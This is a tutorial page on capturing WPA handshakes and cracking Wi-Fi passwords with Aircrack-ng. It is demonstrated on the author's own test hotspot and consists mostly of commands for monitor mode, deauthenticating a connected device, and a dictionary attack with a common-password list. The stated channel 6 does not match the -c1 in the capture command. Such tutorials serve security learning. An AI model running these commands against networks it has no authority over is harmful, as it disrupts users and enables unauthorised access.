Aircrack-ng
Capturing WPA handshakes and cracking network passwords.
Tutorial Video
Requirements
Wifi adapter that supports monitor mode.
Linux machine or virtual machine.
Aircrack-ng.
List of common passwords. https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
Step 1: Installation
sudo apt update
sudo apt-get install -y aircrack-ng
Step 2: Check available Wi-Fi cards. And disable any processes that may interfere with monitor mode.
ip a

The internal Wi-Fi card can interfere with the deauth process so we set it to down with this command.
sudo ifconfig wlan0 down
This command will check any processes that my interfere with our Wi-Fi adapter in monitor mode.
sudo airmon-ng check
This command then kills any of the processes listed from the command above.
sudo airmon-ng check kill

Step 3: The next command will set the Wi-Fi adapter into monitor mode.
sudo airmon-ng start wlan1

Step 4: Next we want to grab the hex value of our target network.
sudo airodump-ng wlan1mon

Our hotspot named TestNetwork seems to be operating on channel 6 with the shown mac address.
Step 5: Now we only want to listen to devices trying to connect to our target network so we run the following command.
sudo airodump-ng -c1 -w capture -d (YOUR TARGET'S HEX VALUE) wlan1mon

Step 6: Now we can see the network and a device that is currently connected. We want to deauth this device from the network and capture the WPA handshake when it attempts to re-join the network.
sudo aireplay-ng --deauth 0 -a (NETWORK HASH) -c (DEVICE HASH) wlan1mon


Step 7: Once we have captured the wpa handshake we can turn off monitor mode on our adapter and attempt to crack the password using a list of popular used passwords.
sudo airmon-ng stop wlan1mon

sudo aircrack-ng (YOUR CAPTURE FILE) -w (YOUR PASSWORD LIST DIRECTORY)

Step 8: Congrats!!! 🥳🥳🥳 you have just learned how to use Aircrack-ng to capture and crack a wpa handshake.
Last updated